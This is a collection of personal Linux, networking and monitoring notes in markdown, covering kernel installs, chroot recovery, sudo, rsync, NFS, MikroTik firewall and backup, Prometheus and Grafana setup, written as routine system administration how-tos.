43 | ``` 44 | 45 | ## 8. Install the kernel 46 | ``` 47 | sudo make install 48 | ``` 49 | 50 | ## 9. (OPTIONAL) Update bootloader 51 | ``` 52 | # The `make install` command performs this process automatically, but you can also do it manually 53 | sudo update-initramfs -c -k ${LINUX_KERNEL_INST_VERSION} 54 | sudo update-grub 55 | ``` 56 | 57 | ## 10. Reboot 58 | ## 11. If the kernel does not change, then ([reference](https://askubuntu.com/questions/82140/how-can-i-boot-with-an-older-kernel-version)) 59 | ``` 60 | # 1. 
Find kernel number 61 | sudo grub-mkconfig | grep -iE "menuentry 'Ubuntu, with Linux" | awk '{print i++ " : "$1, $2, $3, $4, $5, $6, $7}' 62 | 63 | # 2. Change GRUB_DEFAULT="1>N" where N is the index of the required kernel 64 | sudo nano /etc/default/grub 65 | 66 | # 3. Update 67 | sudo update-grub 68 | ``` 69 | -------------------------------------------------------------------------------- /Linux/cgroup/README.md: -------------------------------------------------------------------------------- 1 | # CGroup 2 | 3 | A **cgroup** (short for control group) in Linux is a kernel feature that organizes and limits system resources (CPU, memory, disk I/O, etc.) for a group of processes. 4 | 5 | **Containers**, **systemd**, and other technologies utilize this feature in order to work. 6 | 7 | View cgroups: `systemctl status` 8 | Inspect cgroups: `systemd-cgtop` 9 | 10 | \*By default only 3 levels are displayed (to increase this value: `--depth=<N>`) 11 | 12 | You can usually find cgroups mounted in: `/sys/fs/cgroup` 13 | 14 | Slice file 15 | ``` 16 | [Slice] 17 | MemoryHigh=500M 18 | ``` 19 | 20 | `systemd-run --user --slice=<name>.slice <command>` -------------------------------------------------------------------------------- /Linux/chroot-liveusb.md: -------------------------------------------------------------------------------- 1 | # Live USB chroot 2 | There are occasions in which we need to log in to a system that cannot boot properly, perhaps because it is corrupted, has a wrong configuration, etc. 3 | 4 | This contains the instructions to boot from a live USB into a distribution in order to fix the problem. To achieve this we will leverage `chroot`. Before continuing, create a bootable USB, boot using it, and open a terminal. Then follow these steps: 5 | 6 | ## 0. Find disk 7 | Use `lsblk` or `df -h` 8 | 9 | 10 | ## 1. Mount the root partition 11 | ``` 12 | sudo mount /dev/sdaX /mnt 13 | ``` 14 | 15 | ## 2. 
If present, mount the separate boot partition 16 | ``` 17 | sudo mount /dev/sdaY /mnt/boot 18 | ``` 19 | 20 | ## Bind system directories 21 | ``` 22 | sudo mount -t proc /proc /mnt/proc 23 | sudo mount -o bind /dev /mnt/dev 24 | sudo mount -t sysfs /sys /mnt/sys 25 | sudo mount -o bind /run /mnt/run 26 | sudo mount -t devpts devpts /mnt/dev/pts 27 | ``` 28 | 29 | ## Chroot 30 | ``` 31 | sudo chroot /mnt /bin/bash 32 | ``` 33 | 34 | --- 35 | 36 | ## DO ANYTHING you want! 37 | Maybe install packages, remove files, etc... 38 | 39 | --- 40 | 41 | ## At the end 42 | ``` 43 | exit 44 | sudo umount /mnt/dev/pts /mnt/run /mnt/sys /mnt/dev /mnt/proc /mnt/boot /mnt 45 | sudo reboot 46 | ``` -------------------------------------------------------------------------------- /Linux/dnf/README.md: -------------------------------------------------------------------------------- 1 | # DNF package manager 2 | 3 | `dnf` (Dandified YUM) is a package manager for RPM-based Linux distributions like: 4 | - Fedora 5 | - RHEL (Red Hat Enterprise Linux) 6 | - CentOS 7 | - Rocky Linux, AlmaLinux, etc. 8 | 9 | What it does: 10 | - Installs, removes, updates, and manages software packages. 11 | - Resolves dependencies automatically. 12 | - Works with **.rpm** packages (Red Hat Package Manager format). 13 | - Replaces the older yum tool. 14 | 15 | Backend tool: **rpm**. 16 | 17 | --- 18 | 19 | ## Common Commands 20 | | Command | Description | 21 | |----------------------------------------------|-------------------------------------------------------------------------------------------------------| 22 | | `sudo dnf versionlock <package>` | Do not update/upgrade a package (lock its version). Requires `sudo dnf install 'dnf-command(versionlock)'`. Useful for locking a specific kernel version. 
| 23 | `dnf search <keyword>` | Search for a package | 24 | `dnf info <package>` | Get detailed info about a package | 25 | `sudo dnf install <package>` | Install a package | 26 | `sudo dnf remove <package>` | Remove a package | 27 | `sudo dnf update` | Update all packages | 28 | `sudo dnf update <package>` | Update a specific package | 29 | `dnf list installed` | List all installed packages | 30 | `dnf list available` | List available packages | 31 | `sudo dnf clean all` | Clean cache and metadata | 32 | 33 | -------------------------------------------------------------------------------- /Linux/load-average.md: -------------------------------------------------------------------------------- 1 | # Load average 2 | 3 | A measure of how busy the system is. 4 | 5 | > [!TIP] 6 | > **Rule of thumb**: Load average should be ≤ number of CPU cores. 7 | 8 | ## Useful Commands 9 | | Command | Description | 10 | |-----------------------|-----------------------------------------------------------------------------| 11 | | `uptime` | Shows how long the system has been running, number of users, and load average. | 12 | | `cat /proc/loadavg` | Displays the same load averages as `uptime`, running / total processes and last PID. | 13 | | `top` | Interactive process viewer that also shows load averages and CPU usage. | 14 | | `nproc` | Displays the number of processing units (cores) available. | 15 | 16 | 17 | ## Output 18 | ```bash 19 | load average: 0.02, 0.20, 0.02 20 | # Load average is shown for 1, 5, and 15 minutes. 21 | ``` 22 | 23 | Load average is not normalized to the number of CPUs: a load of 1.0 represents one fully utilized core. 
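The rule of thumb above can be checked with a short script (a sketch: it reads the 1-minute load average from `/proc/loadavg` and compares it against `nproc`):

```shell
#!/bin/bash
# Compare the 1-minute load average against the number of CPU cores.
read -r load1 _ < /proc/loadavg   # first field is the 1-minute average
cores=$(nproc)

# bash has no floating-point arithmetic, so delegate the comparison to awk
if awk -v l="$load1" -v c="$cores" 'BEGIN { exit !(l > c) }'; then
  echo "Overloaded: load ${load1} > ${cores} core(s)"
else
  echo "OK: load ${load1} <= ${cores} core(s)"
fi
```

The same `awk` trick is handy anywhere a float comparison is needed in a shell script.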
24 | 25 | **How to interpret:** 26 | | Load Avg | Cores (nproc) | Interpretation | 27 | | ---------| ------------- | -------------- | 28 | | 1.0 | 1 | Full CPU usage | 29 | | 2.0 | 1 | Overloaded | 30 | | 0.5 | 1 | Underloaded (50% utilization) | 31 | | 4.0 | 4 | Fully utilized (ideal scenario) | 32 | | 6.0 | 4 | Overloaded (may experience latency/slowness) | -------------------------------------------------------------------------------- /Linux/logs/README.md: -------------------------------------------------------------------------------- 1 | # Logs 2 | 3 | Most of the logs exist under the `/var/log/` dir. 4 | 5 | 6 | **Binary log files:** 7 | | Binary file | Command to read log | Distro | Description | 8 | | ----------- | ------------------- | ------ | ----------- | 9 | | **/var/log/wtmp** | `last` | RH/Debian | Shows the login history of users | 10 | | **/var/log/lastlog** | `lastlog` | RH/Debian | Displays the most recent login of all users | 11 | | **/var/log/btmp** | `lastb -adF` | RH/Debian | Bad login attempts (Check malicious activity) | 12 | 13 | 14 | **Text log files:** 15 | | Text file | Distro | Description | Tricks/Extra info | 16 | | --------- | ------ | ----------- | ------ | 17 | | **/var/log/auth.log** | Debian | Authorization attempts | Can be used to troubleshoot SSH login attempts that fail | 18 | | **/var/log/secure** | RH | Authorization attempts | * Not enabled by default in some distros; use journalctl instead | 19 | | **/var/log/syslog** | Debian | System messages and logs | 20 | | **/var/log/messages** | RH | System messages and logs | -------------------------------------------------------------------------------- /Linux/misc/README.md: -------------------------------------------------------------------------------- 1 | # General misc notes 2 | 3 | ## > Default CLI editor 4 | To set the default editor, set this ENV var 5 | ```bash 6 | export EDITOR=vim 7 | ``` 8 | 9 | or 10 | ```bash 11 | echo "export EDITOR=vim" >> ~/.bashrc && source ~/.bashrc 12 | ``` 13 
| 14 | 15 | 16 | 17 | ## > Laptop LID 18 | 19 | [Source](https://askubuntu.com/questions/15520/how-can-i-tell-ubuntu-to-do-nothing-when-i-close-my-laptop-lid) 20 | 21 | Action to take when closing the laptop lid (do nothing): 22 | 1. Edit: `sudoedit /etc/systemd/logind.conf` 23 | 2. Then make sure that this configuration is available: `HandleLidSwitch=ignore` 24 | 3. Restart the daemon: `sudo systemctl restart systemd-logind` 25 | 26 | ## > `sudoedit` vs `sudo -e` vs `sudo vim` 27 | 28 | | Command | Editor runs as | Safe? | Uses `$EDITOR` | Temporary copy? | Recommended | 29 | |---------------|----------------|--------|----------------|------------------|-------------| 30 | | `sudoedit` | User | Yes | Yes | Yes | Yes | 31 | | `sudo -e` | User | Yes | Yes | Yes | Yes | 32 | | `sudo vim` | Root | No | No | No | No | 33 | 34 | > [!CAUTION] 35 | > Always use `sudoedit` or `sudo -e` for editing system files. 36 | 37 | > [!NOTE] 38 | > `sudo -e` is just a different syntax for `sudoedit` -------------------------------------------------------------------------------- /Linux/storage/disks-manipulation.md: -------------------------------------------------------------------------------- 1 | # Disk manipulation 2 | --- 3 | 4 | ## fdisk 5 | A command-line utility to create, delete, and modify disk partitions on a Linux system. 6 | 7 | ### List disks 8 | `sudo fdisk -l` 9 | 10 | ### To list the partitions on a disk: 11 | `fdisk -l <disk>` 12 | 13 | ### Modify partitions on a disk 14 | `sudo fdisk <disk>` 15 | 16 | --- 17 | 18 | ## cfdisk 19 | TUI partition manager to create, delete, resize (non-destructively), and manage partitions; great for MBR/GPT, visually intuitive. 20 | 21 | `sudo cfdisk` 22 | 23 | --- 24 | 25 | ## parted 26 | 27 | Resize, move, and create partitions; GPT and MBR support. 28 | 29 | `sudo parted /dev/sdX` 30 | 31 | --- 32 | 33 | ## mkfs 34 | `mkfs` (make file system) is a command used to create a file system on a partition or disk. 
35 | 36 | ### Format partition to `ext4` 37 | `sudo mkfs.ext4 <partition>` 38 | or 39 | `sudo mkfs -t <filesystem_type> <partition>` 40 | where `filesystem_type` can be `ext4`, `xfs`, etc. 41 | 42 | --- 43 | 44 | ## mount 45 | Is used to attach a file system to a specified mount point. 46 | 47 | ### To temporarily mount a file system: 48 | `sudo mount <device> <mount_point>` 49 | 50 | ### Permanent mounting (persistent after reboot) 51 | 1. Edit `/etc/fstab`, and append this line: 52 | ``` 53 | <device> <mount_point> <filesystem_type> defaults 0 0 54 | ``` 55 | 2. Run `mount -a` to mount it. 56 | 57 | 3. Check if it is mounted by running `df -h`. 58 | 59 | Extra options: 60 | - `-f`: Fake mount (skips the mount syscall). 61 | - `-v`: Verbose, also print some messages. 62 | 63 | --- 64 | 65 | ## umount 66 | `umount` is used to unmount a mounted file system. 67 | 68 | To unmount a file system: 69 | `umount <mount_point>` 70 | 71 | --- 72 | 73 | ## lsblk 74 | List all block devices, providing details about disks and partitions. 75 | 76 | ### Usage 77 | `sudo lsblk` 78 | 79 | --- 80 | 81 | ## partprobe 82 | Inform the kernel of partition table changes. 83 | 84 | ### Usage 85 | `sudo partprobe <device>` -------------------------------------------------------------------------------- /Linux/storage/nfs.md: -------------------------------------------------------------------------------- 1 | # Network File System (NFS) 2 | 3 | > [!IMPORTANT] 4 | > NFS (v3 and v4) by default doesn't support password authentication like Samba does. 5 | > So you can restrict access by IP/subnet rather than using usernames and passwords. 6 | 7 | ---- 8 | 9 | ## Server 10 | 11 | ### 1. Create parent dir 12 | The directory in which all shared folders will exist 13 | 14 | ### 2. Create subdirs 15 | These folders should be located in the parent dir, and will be all the shareable folders. 16 | 17 | ### 3. Install software 18 | 19 | **Debian** 20 | ```bash 21 | sudo apt update -y 22 | sudo apt install -y nfs-kernel-server 23 | ``` 24 | 25 | ### 4. 
Configure the NFS server 26 | 27 | Create a backup file (in case it is needed) 28 | ```bash 29 | sudo cp /etc/exports /etc/exports.bak 30 | ``` 31 | 32 | Then edit `/etc/exports` like this: 33 | ```txt 34 | <shared_dir> <allowed_network>(rw,no_subtree_check) 35 | ``` 36 | 37 | E.g. 38 | ``` 39 | /home/user/nfs_shares/files/ 192.168.0.0/255.255.255.0(rw,no_subtree_check) 40 | /home/user/nfs_shares/documents/ 192.168.0.0/255.255.255.0(rw,no_subtree_check) 41 | /home/user/nfs_shares/backups/ 192.168.0.0/255.255.255.0(rw,no_subtree_check) 42 | ``` 43 | 44 | > [!IMPORTANT] 45 | > If you need root access from the client, then include `no_root_squash` in the options list. 46 | 47 | ### 5. Restart nfs server 48 | ```bash 49 | sudo systemctl restart nfs-kernel-server 50 | systemctl status nfs-kernel-server 51 | ``` 52 | 53 | --- 54 | 55 | ## Client 56 | 57 | ### 1. Install software 58 | 59 | **Debian** 60 | ```bash 61 | sudo apt update -y 62 | sudo apt install -y nfs-common 63 | ``` 64 | 65 | ### 2. Verify server connectivity 66 | 67 | ```bash 68 | showmount --exports <server_ip> # This should display all the subdirs that exist in /etc/exports 69 | ``` 70 | 71 | ### 3. Preparation 72 | As with the server, create a parent dir and subdirs that will be attached to the remote dirs. 73 | 74 | ### 4. Mount remote shares 75 | ```bash 76 | sudo mount <server_ip>:<shared_dir> <local_mount_dir> 77 | ``` 78 | Now you should be able to use the remote dirs. 79 | 80 | ### 5. Verify mounts 81 | ```bash 82 | df -h 83 | # Or run 84 | mount 85 | ``` 86 | 87 | ### 6. Unmount 88 | ```bash 89 | sudo umount <local_mount_dir> 90 | ``` -------------------------------------------------------------------------------- /Linux/sudo.md: -------------------------------------------------------------------------------- 1 | # Sudo permissions 2 | 3 | ## Give sudo permissions to a user 4 | 5 | ### 1. Add User to the sudo Group (Debian/Ubuntu and derivatives) 6 | ``` 7 | sudo usermod -aG sudo <username> 8 | ``` 9 | 10 | ### 2. 
Add User to the wheel Group (Red Hat/CentOS/Fedora and derivatives) 11 | ``` 12 | sudo usermod -aG wheel <username> 13 | ``` 14 | 15 | ### 3. Edit the `/etc/sudoers` File 16 | 1. Run `sudo visudo` 17 | 2. Add a line like: `<username> ALL=(ALL:ALL) ALL` 18 | 19 | ### 4. Create a Custom File in `/etc/sudoers.d/` 20 | 1. Run `sudo visudo -f /etc/sudoers.d/<filename>` 21 | 2. Content: `<username> ALL=(ALL) NOPASSWD: ALL` 22 | 3. Run `sudo chmod 0440 /etc/sudoers.d/<filename>` (File must have 0440 permissions) 23 | 24 | ### 5. Grant Specific Command Permissions 25 | Instead of full access, you can give access to only certain commands (comma-separated): 26 | ``` 27 | <username> ALL=(ALL) /path/to/command1,/path/to/command2 28 | ``` 29 | 30 | ## Become sudo 31 | 32 | | Command | Behavior | 33 | |-----------------|--------------------------------------------------------| 34 | | `sudo -i` | Simulates a full root login, loads root's profile (like `/root/`). | 35 | | `sudo su` | You become root, but with your user's environment and current directory | 36 | | `sudo su -` | You become root, and also load root's full environment (like `sudo -i`) | -------------------------------------------------------------------------------- /Linux/useful-commands.md: -------------------------------------------------------------------------------- 1 | # Useful Linux commands 2 | 3 | ## Random file of size N 4 | Create a file containing random printable characters of a specific size 5 | 6 | `FILE_SIZE=$((1024 * 10)) ; tr -cd '[:print:]' < /dev/random | head -c ${FILE_SIZE} > file.txt` 7 | 8 | Where: 9 | * tr: Translates/deletes characters. 10 | * -c: Complements the set, i.e., matches everything except the specified characters. 11 | * -d: Deletes characters not in the set. 12 | * [:print:]: Matches all printable characters, including spaces. 
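A quick way to verify the one-liner above actually produced the requested size (a sketch; `/dev/urandom` is used here instead of `/dev/random` since the latter can block when entropy is low):

```shell
#!/bin/bash
# Create a 10 KiB file of random printable characters and verify its size.
FILE_SIZE=$((1024 * 10))
tr -cd '[:print:]' < /dev/urandom | head -c "${FILE_SIZE}" > file.txt

# wc -c counts bytes; printable ASCII is one byte per character
actual=$(wc -c < file.txt)
echo "Requested ${FILE_SIZE} bytes, wrote ${actual} bytes"
```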
13 | 14 | --- 15 | 16 | ## `rsync` 17 | 18 | ### Copy files 19 | `rsync -ahP <source_dir>/ <destination_dir>/` 20 | 21 | Where: 22 | * -a: Preserve timestamps (among other options, like recursive copy for directories) 23 | * -h: Human readable 24 | * -P: Combines 25 | * --progress: Display progress during transfer. 26 | * --partial: Useful for large files; even if the transfer is disrupted, it can be resumed. 27 | 28 | ### Sync folders 29 | `rsync -ahP --delete <source_dir>/ <destination_dir>/` 30 | 31 | Where: 32 | * --delete: Will keep both folders identical, so if something exists in the destination that is not present in the source, it will be deleted. 33 | 34 | ### Move files from one dir to another 35 | `rsync -ahP --remove-source-files <source_dir>/ <destination_dir>/` 36 | 37 | This will keep empty directories though; it will not delete them. 38 | A workaround is to run afterwards: `find ${source_dir} -type d -empty -delete` 39 | 40 | ### Remote transfer 41 | 42 | #### Local -> Server 43 | `rsync -ahPz <local_path> <user>@<server>:<remote_path>` 44 | 45 | rsync uses ssh in the background. 46 | 47 | Where: 48 | * -z: Compress before transfer 49 | 50 | #### Server -> Local 51 | `rsync -ahPz -e 'ssh -p 22' <user>@<server>:<remote_path> <local_path>` 52 | 53 | Where: 54 | * -z: Compress before transfer 55 | * -e: Pass the ssh arguments in quotes, as in a normal ssh command. 56 | 57 | ## date 58 | Usage: `date +"<FORMAT>"` 59 | Where FORMAT is any combination of the %X format options (see `date --help`) 60 | 61 | E.g. 
62 | - `date +"%d-%m-%Y %T"`: 21-04-2025 22:21:31 -------------------------------------------------------------------------------- /Markdown/highlights.md: -------------------------------------------------------------------------------- 1 | # Highlight options 2 | 3 | --- 4 | 5 | ## Simple format 6 | > **Note** 7 | > This is a note 8 | 9 | > **Warning** 10 | > This is a warning 11 | 12 | --- 13 | 14 | ## Extended types 15 | > [!NOTE] 16 | > NOTE 17 | 18 | > [!TIP] 19 | > TIP 20 | 21 | > [!IMPORTANT] 22 | > IMPORTANT 23 | 24 | > [!WARNING] 25 | > WARNING 26 | 27 | > [!CAUTION] 28 | > CAUTION 29 | 30 | --- 31 | 32 | ## Nested 33 | > [!Note] This also includes a title 34 | > Note body 35 | > > [!Hint]- Hint title 36 | > > This is hint body 37 | -------------------------------------------------------------------------------- /Mikrotik/1.Mikrotik-update.md: -------------------------------------------------------------------------------- 1 | # Mikrotik Update 2 | 3 | 1. **[System]:** → `Packages` 4 | 1. `Check For Updates` 5 | 2. `Download & Install` 6 | 7 | 2. **[System]:** → `RouterBOARD` 8 | 1. `Upgrade` 9 | 2. `OK` 10 | 11 | 3. **[System]:** → `Reboot` 12 | 1. `Yes` -------------------------------------------------------------------------------- /Mikrotik/2.Backup.md: -------------------------------------------------------------------------------- 1 | # Backup 2 | 3 | ## 1. CREATE a BU file 4 | **TODO:** change yourpassword: 5 | 6 | ``` 7 | /system backup cloud upload-file action=create-and-upload password={yourpassword} 8 | ``` 9 | 10 | ## 2. CHECK CLOUD BU SLOT: 11 | This returns a secret-key which needs to be stored if we need to download 12 | it from a different device 13 | ```bash 14 | /system backup cloud print 15 | ``` 16 | 17 | ## 3. DOWNLOAD BACKUP (from the same device): 18 | ```bash 19 | /system backup cloud download-file action=download number=0 20 | ``` 21 | 22 | ## 4. 
DOWNLOAD BACKUP (from another device): 23 | ```bash 24 | /system backup cloud download-file action=download secret-download-key={exported-key} 25 | ``` 26 | 27 | ## 5. REMOVE BU FILE FROM MIKROTIK SERVERS: 28 | ```bash 29 | /system backup cloud remove-file number=0 30 | ``` -------------------------------------------------------------------------------- /Mikrotik/Firewall.md: -------------------------------------------------------------------------------- 1 | # Firewall 2 | 3 | ## Port Forwarding 4 | ### WAN --> LAN port forward 5 | ``` 6 | /ip firewall nat add chain=dstnat in-interface=<WAN_interface> protocol=tcp dst-port=<WAN_port> action=dst-nat to-addresses=<LAN_IP> to-ports=<LAN_port> 7 | /ip firewall filter add chain=forward protocol=tcp dst-port=<LAN_port> dst-address=<LAN_IP> action=accept 8 | ``` 9 | 10 | ## Block traffic 11 | 12 | ### Between 2 devices 13 | > [!IMPORTANT] 14 | > **NOT TESTED YET** 15 | 16 | Assume that you have: 17 | - Device A: having IP-A 18 | - Device B: having IP-B 19 | 20 | And you want these two devices to communicate only on port 22, dropping connections on any other port 21 | 22 | ```mermaid 23 | graph LR 24 | 25 | devA["Device A 26 | IP A"] 27 | 28 | 29 | devB["Device B 30 | IP B"] 31 | 32 | devA <-- port 22 --> devB 33 | ``` 34 | 35 | Commands 36 | ``` 37 | # A --> B 38 | /ip firewall filter add chain=forward src-address=<IP-A> dst-address=<IP-B> protocol=tcp dst-port=22 action=accept comment="Allow SSH from A to B" 39 | /ip firewall filter add chain=forward src-address=<IP-A> dst-address=<IP-B> protocol=tcp dst-port=!22 action=drop comment="Block all except port 22 from A to B" 40 | 41 | # B --> A 42 | /ip firewall filter add chain=forward src-address=<IP-B> dst-address=<IP-A> protocol=tcp dst-port=22 action=accept comment="Allow SSH from B to A" 43 | /ip firewall filter add chain=forward src-address=<IP-B> dst-address=<IP-A> protocol=tcp dst-port=!22 action=drop comment="Block all except port 22 from B to A" 44 | ``` -------------------------------------------------------------------------------- /Misc/ipmi.md: 
-------------------------------------------------------------------------------- 1 | # IPMI 2 | 3 | [Intelligent Platform Management Interface](https://en.wikipedia.org/wiki/Intelligent_Platform_Management_Interface) is a standard for remote server management, mainly used in data centers and enterprise environments. 4 | 5 | IPMI lets you manage a server remotely even when it is: 6 | - Powered off 7 | - Crashed 8 | - Without an installed OS 9 | 10 | It works below the OS level, giving you out-of-band management capabilities. 11 | 12 | ## How It Works 13 | 14 | It runs on a separate microcontroller called the **BMC (Baseboard Management Controller)**. 15 | 16 | The BMC operates independently of the main CPU/OS and usually has its own 17 | network port (or shares one with the server). 18 | 19 | ## Accessing IPMI 20 | 21 | You can use: 22 | - Web Interface (most BMCs have a web UI) 23 | - CLI tools like [ipmitool](https://github.com/ipmitool/ipmitool) 24 | - Redfish (a newer alternative to IPMI) 25 | 26 | E.g. 27 | ``` 28 | ipmitool -I lanplus -H <BMC_IP> -U <username> -P <password> power status 29 | ``` 30 | 31 | ## Examples of IPMI 32 | 33 | - [Dell iDRAC](https://www.dell.com/en-us/lp/dt/open-manage-idrac) 34 | - [Supermicro IPMI](https://www.supermicro.com/en/solutions/management-software/bmc-resources) 35 | - [Lenovo IMM](https://lenovopress.lenovo.com/tips0849-imm2-support-on-lenovo-servers) 36 | - [ASRock Rack IPMI](https://www.asrockrack.com/support/IPMI.pdf) 37 | 38 | -------------------------------------------------------------------------------- /Misc/mdm.md: -------------------------------------------------------------------------------- 1 | # Mobile device management 2 | 3 | Mobile Device Management (MDM) is a system or software solution that helps organizations securely manage, monitor, and control mobile devices like smartphones, tablets, and laptops used by employees. 
4 | 5 | Key features of MDM: 6 | - Remote device configuration (e.g., Wi-Fi, VPN, email) 7 | - Security enforcement (e.g., screen lock, encryption, antivirus) 8 | - App management (install, update, or remove apps) 9 | - Remote wipe (erase data if a device is lost or stolen) 10 | - Device inventory and monitoring (track devices, usage, and compliance) 11 | 12 | Common MDM Solutions: 13 | - Microsoft Intune 14 | - VMware Workspace ONE 15 | - Jamf (for Apple devices) 16 | - IBM MaaS360 17 | - Flyve MDM -------------------------------------------------------------------------------- /Monitoring/Prometheus/examples/hello-world/README.md: -------------------------------------------------------------------------------- 1 | # Hello World 2 | 3 | 1. Download the Prometheus binary from [here](https://prometheus.io/download/), or use a Docker container or similar that contains it. 4 | 2. Copy `prometheus.yml` to the home directory of the target environment 5 | 3. Open the CLI and run Prometheus, making sure to pass the correct configuration file as an argument: `--config.file="prometheus.yml"`. 6 | 4. Inspect `http://localhost:9090`; the Prometheus UI should be available 7 | 5. 
Make sure that the targets are reachable -------------------------------------------------------------------------------- /Monitoring/Prometheus/examples/hello-world/prometheus.yml: -------------------------------------------------------------------------------- 1 | global: 2 | scrape_interval: 15s 3 | evaluation_interval: 15s 4 | 5 | scrape_configs: 6 | - job_name: "prometheus" 7 | static_configs: 8 | - targets: ["localhost:9090"] 9 | 10 | - job_name: "demo" 11 | static_configs: 12 | - targets: 13 | - demo.promlabs.com:10000 14 | - demo.promlabs.com:10001 15 | - demo.promlabs.com:10002 -------------------------------------------------------------------------------- /Monitoring/grafana.md: -------------------------------------------------------------------------------- 1 | # Grafana 2 | 3 | Grafana is a powerful open-source platform for monitoring and observability. 4 | 5 | It allows you to visualize and analyze metrics from various data sources like Prometheus, InfluxDB, MySQL, PostgreSQL, and more. 6 | 7 | Grafana queries metrics from Prometheus (or other databases) using a query language like **PromQL**. 8 | 9 | --- 10 | 11 | ## Model 12 | ```mermaid 13 | %%{init: {'theme':'neutral'}}%% 14 | graph LR 15 | 16 | Grafana --> |Prom QL| prom["Prometheus Server"] 17 | ``` 18 | 19 | ## Connection 20 | **Default URL**: `http://:3000` 21 | **Default Credentials** 22 | Username: **admin** 23 | Password: **admin** 24 | 25 | --- 26 | 27 | ## > Prometheus 28 | 29 | In order to connect a Prometheus server to Grafana: 30 | 31 | 1. `Home` > `Connections` > `Data sources` > `Add data source` > `Prometheus` 32 | 1. Set a unique name for the data source 33 | 2. Set Prometheus server URL (e.g., `http://localhost:9090`) 34 | 3. Click Save & Test to verify the connection 35 | 36 | ## > Dashboards 37 | Dashboards in Grafana are composed of panels, each representing a visual element such as a graph, gauge, or stat. 
38 | 39 | ### Panel Editor Structure 40 | The panel editor is divided into three key sections: 41 | 42 | 1. Visualization (top): Displays the resulting graph or visualization **[V]** 43 | 2. Data queries (bottom): To build and test queries **[D]** 44 | 3. Panel Options (left): Settings for the panel title, description, units, and other visual options **[P]** 45 | 46 | ### Create a new Panel (Visualization) 47 | 1. Select the visualization type (e.g. time series) **[P]** 48 | 2. Set time to display **[V]** 49 | 3. Set `Data source` **[D]** 50 | 4. Create queries **[D]** 51 | 5. `Run queries` **[D]** and visualize them **[V]** 52 | 6. Modify them as needed **[D]** 53 | 7. Give a `Title` to the panel **[P]** 54 | 8. Search and set `Unit` **[P]** to help Grafana display the graphs better 55 | 9. When ready, click `Save dashboard` 56 | 57 | ### Ready to use Dashboards 58 | 59 | Instead of creating a dashboard from scratch, there is a list of ready-to-use dashboards available [here](https://grafana.com/grafana/dashboards/) 60 | 61 | **How to leverage them?** 62 | 1. Find the Dashboard `ID`. 63 | 2. `Home` > `Dashboards` > `Import dashboard` 64 | 3. Paste the Dashboard `ID` 65 | 4. Click `Load` 66 | 5. Choose `Data source` 67 | 6. `Import` 68 | 69 | --- 70 | -------------------------------------------------------------------------------- /Networks/CCNA/cisco-packet-tracer.md: -------------------------------------------------------------------------------- 1 | # Cisco Packet Tracer 2 | 3 | ## Options 4 | 5 | ### Simulation 6 | 7 | 1. `Options` > `Preferences` > `Miscellaneous` 8 | 1. Check [x] `Buffer Filtered Events Only` 9 | 2. `Simulation - Buffer Full Action`: `Auto Clear Event List` 10 | 11 | ### Labels 12 | 1. `Options` > `Preferences` > `Interface` 13 | 1. 
`Show Device Model Labels` -------------------------------------------------------------------------------- /Networks/CCNA/sfp.md: -------------------------------------------------------------------------------- 1 | # SFP (Small Form-factor Pluggable) 2 | 3 | Small Form-factor Pluggable is a compact, hot-pluggable network interface module used in telecommunication and data communication applications. 4 | 5 | It can be used for either copper or fiber connections. -------------------------------------------------------------------------------- /Networks/dhcpcd.md: -------------------------------------------------------------------------------- 1 | # DHCPCD (DHCP client) 2 | 3 | ### Reassign DHCP IP address 4 | ```bash 5 | # 0. Find the interface that you want to use 6 | ip link show 7 | 8 | # 1. Kill all dhcpcd processes and release the IP 9 | sudo dhcpcd -k 10 | 11 | # 2. Flush existing IP addresses on the interface 12 | sudo ip addr flush dev <interface> 13 | 14 | # 3. Start dhcpcd fresh 15 | sudo dhcpcd 16 | ``` -------------------------------------------------------------------------------- /Networks/dmz.md: -------------------------------------------------------------------------------- 1 | # DMZ 2 | 3 | A DMZ, or Demilitarized Zone, in networking is a separate subnetwork that sits between your trusted internal network and an untrusted external network (like the internet). It’s designed to expose external-facing services—such as web, email, or FTP servers—to the outside world while keeping your internal network protected. By isolating these services, even if an attacker compromises a server in the DMZ, your core internal network remains shielded from direct exposure.
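
A sketch of the described topology:

```mermaid
%%{init: {'theme':'neutral'}}%%
graph LR

    internet(("Internet")) --> firewall["Firewall/Router"]
    firewall --> dmz["DMZ: web / email / FTP servers"]
    firewall --> internal["Trusted internal network"]
```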
-------------------------------------------------------------------------------- /Networks/high-availability.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## 2 Tier Architecture - With redundancy 4 | ```mermaid 5 | %%{ init: {'theme':'neutral', 'flowchart': { 'curve': 'stepAfter' } } }%% 6 | flowchart LR 7 | 8 | subgraph Network[" "] 9 | direction TB 10 | 11 | router1(("Router")) 12 | router2(("Router")) 13 | 14 | subgraph distribution["Distribution Layer [Tier 2]"] 15 | direction LR 16 | multilayer_switch1[["Multilayer switch (L3)"]] 17 | multilayer_switch2[["Multilayer switch (L3)"]] 18 | end 19 | 20 | subgraph access["Access Layer [Tier 1]"] 21 | direction LR 22 | switch1[["Switch1"]] 23 | switch2[["Switch2"]] 24 | switch3[["Switch3"]] 25 | end 26 | 27 | router1 <--> multilayer_switch1 28 | router1 <--> multilayer_switch2 29 | 30 | router2 <--> multilayer_switch1 31 | router2 <--> multilayer_switch2 32 | 33 | multilayer_switch1 <--> switch1 34 | multilayer_switch1 <--> switch2 35 | multilayer_switch1 <--> switch3 36 | 37 | multilayer_switch2 <--> switch1 38 | multilayer_switch2 <--> switch2 39 | multilayer_switch2 <--> switch3 40 | end 41 | ``` 42 | 43 | \* The distribution layer is also referred to as the aggregation layer 44 | -------------------------------------------------------------------------------- /Networks/ip.md: -------------------------------------------------------------------------------- 1 | # IP Address 2 | 3 | ## Private IP ranges (defined in RFC 1918) 4 | ### Class A 5 | 10.0.0.0 - 10.255.255.255 6 | CIDR Notation: /8 7 | Netmask: 255.0.0.0 8 | Number of Addresses: 16,777,216 9 | Use Case: Large networks.
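
The "Number of Addresses" figures in these class blocks follow directly from the CIDR prefix length: a /N block contains 2^(32 - N) addresses. A quick shell sketch:

```shell
# A /N block contains 2^(32 - N) addresses.
cidr_size() { echo $(( 2 ** (32 - $1) )); }

cidr_size 8    # 10.0.0.0/8     -> 16777216
cidr_size 12   # 172.16.0.0/12  -> 1048576
cidr_size 16   # 192.168.0.0/16 -> 65536
```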
